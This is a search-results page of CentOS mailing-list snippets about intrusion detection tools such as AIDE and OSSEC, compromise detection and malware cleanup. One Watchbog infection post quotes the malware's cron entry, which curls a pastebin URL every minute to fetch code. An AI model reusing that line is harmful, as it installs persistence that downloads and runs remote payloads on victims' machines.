Displaying 20 results from an estimated 10000 matches similar to: "AIDE or OSSEC on CentOS 5.4 x86_64?"
2010 Mar 04
8
Intrusion Detection
Hello all,
I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately).
Thank you,
Dan Burkland
?
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
Whats is the best way to identify a possible user using a botnet with php
in the server? And if he is using GET commands for example in other server.
Does apache logs outbound conections ?
If it is using a file that is not malicious the clam av would not identify.
Thanks
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance.
The PCI/DSS auditor has stipulated that the web server, application
middleware (tomcat), the db server have to be on different systems.
In addition the auditor has also stipulated that there be a NTP
server, a "patch" server,
The Host OS on all of the above nodes will be CentOS 6.2.
Below is a list of things that would be
2012 Sep 28
1
Changes to inodes discovered by aide
Hi.
On one of my servers aide just reported inode changes to a large bunch of files in a variety of directories, e.g. /usr/bin, /usr/sbin etc. This machine sits behind a couple of firewalls and it would be hard to get to.
The day before I updated "clam*" and updated the aide database right after that:
-rw------- 1 root root 7407412 Sep 26 10:58 aide.db.gz
The problem was that the
2008 Dec 28
1
aide and changes in system
I've checked my system by aide and i've received information:
changed: /bin
changed: /bin/tar
changed: /bin/mv
changed: /bin/cp
changed: /bin/ls
changed: /bin/vi
i don't remember that I changed those commands, what does it mean? Somebody broken in? or those commands are changed normally?
--
This message has been scanned for viruses and
dangerous content by MailScanner, and is
2014 Sep 09
1
C6 : AIDE experience
Having problems with Tripwire on C6, I installed AIDE from the base
repository. x86_64 0.14-3.el6_2.2 base 123 k
typing:
aide
result:
"Couldn't open file /var/lib/aide/aide.db.gz for reading"
(directory is empty and aide.db.gz does not exist.)
typing:
aide -i (for initialise the Aide database)
result:
"AIDE, version 0.14
### AIDE database at
2012 Aug 22
2
Hiera, OSSEC and per-node stuff?
Hi.
I have an interesting use case.
OSSEC is security tool based on server-client architecture. Server
generates keys for agents, and every agent has different key.
Now I want to distribute these keys via puppet. I''ve come accross hiera
and installed it, and it works superbly, but how to store per-node key
in hiera?
This is my idea:
hiera,yaml:
---
:hierarchy:
-
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised??
Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.
What am I missing or not looking at that you security gurus are looking at?
I subscribe to the centos and SANS
2016 Feb 02
2
Wiki Update - Aide Link
Hello All,
My username is MikeThompson
The link to configure Aide at the bottom of this page:
https://wiki.centos.org/HowTos/OS_Protection
Is dead, and says its dead, however, the old link to
http://www.bofh-hunter.com/2008/04/10/centos-5-and-aide/ now redirects
to a malicious website.
One of my less than savvy users got his windows machine infected there
last night. I'm wondering if it
2008 Apr 09
1
aide questions, please
I'm trying out aide since tripwire doesn't seem to be in the 5. releases
anymore. I do not have Selinux on the server (no at installation), and I
just yum installed the aide rpms, so I should have the latest.
When I run my aide --init, I get all of these lines for all the files:
lgetfilecon_raw failed for /usr/share/X11/app-defaults/XLogo:No data
available
I then copy the
2005 Jun 16
3
turning off prelinking?
In short, the reason considering (and still only considering) turning it off is
to make tripwire usable again (security vs. performance, I guess).
Is it possible to completely turn it off system-wide? Any additional steps
needed on the existing system (that already have half of the binaries
prelinked)?
What order of performance degradation to expect? If it is minor, nobody is
going to cry
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services.
I've grown tired of the various kiddie scripts/dictionary attacks on
various services. The latest has been against vsftpd, on systems that I
can't easily control vs. putting strict limits on ssh. We simply have
too many users entering from too many networks many with dynamic IP
addresses.
Enter.... thinking about LIDS or Log Based
2010 Apr 29
1
Aide error "Caught SIGBUS/SEGV"
One of my servers has recently started giving an error every time I run
"aide --check". I ran it manually twice today with the same results.
The second time, I added the -V flag, but that didn't give me anything
useful. The system is currently running CentOS 5.3.
Nothing on the system has changed recently (that I am aware of). The
Aide database hasn't been updated in a few
2015 Jan 13
1
SELinux-alert: aide wants to write to /var/run/winbindd/pipe
Hi,
does anyone know if aide should have access to this socket?
SELinux is preventing /usr/sbin/aide from write access on the sock_file /var/run/winbindd/pipe.
Thanks
Patrick
(on CentOS6 if that matters)
2009 Oct 27
0
Warning message when running aide after upgrading to 5.4
I upgraded my box from 5.3 to 5.4. When running "aide --update", I'm getting this warning message on /var/log/messages "aide: Libgcrypt warning: missing initialization - please fix the application"
Below is the aide version installed:
aide -v
Aide 0.13.1
Compiled with the following options:
WITH_MMAP
WITH_POSIX_ACL
WITH_SELINUX
WITH_XATTR
WITH_LSTAT64
WITH_READDIR64
2006 Mar 29
2
AIDE Reports changed:/boot/grub/stage2
My daily AIDE report suggests Grub''s stage2 file has changed. Could I
trouble you for your opinion about how concerned I should be and what to
do if your concern is moderate or higher?
File: /boot/grub/stage2
MD5 : Mlkt9ZVo59SSjvodt+956Q== ,
yIQIMP6TUHG5BegtoOk0ug==
SHA1 : ZxehaXSXcnH/WlcInHpFnyT1vcg= ,
dReBGlO3DIAB+mjsxUWioB8NlbE=
2010 Aug 16
4
Need tip on an inexpensive printer for college student using CentOS 5.5
Sending my son back to college with a dual-boot laptop with Win 7 and
CentOS 5.5. He uses Win7 to manage his iPod and SW that sometimes
issued by a professor for a specific course...otherwise he uses CentOS
for everything else. That setup worked well last year, except for
printing. He has a low-end Cannon printer that is not supported in the
Linux realm.
Most of his coursework was uploaded to
2011 Feb 02
1
The AIDE section of the Hardening CentOS wiki page
I have recently received an e-mail message regarding the above wiki
page. I reproduce it, below, less the header.
As I was the last to edit that page, I am mentioned in the details at
its foot and that is from where the message author's error originates
-- as I'm not the original creator of the page.
The broken link is to a section of the blog of Jim "Evolution" Perrin.
Are you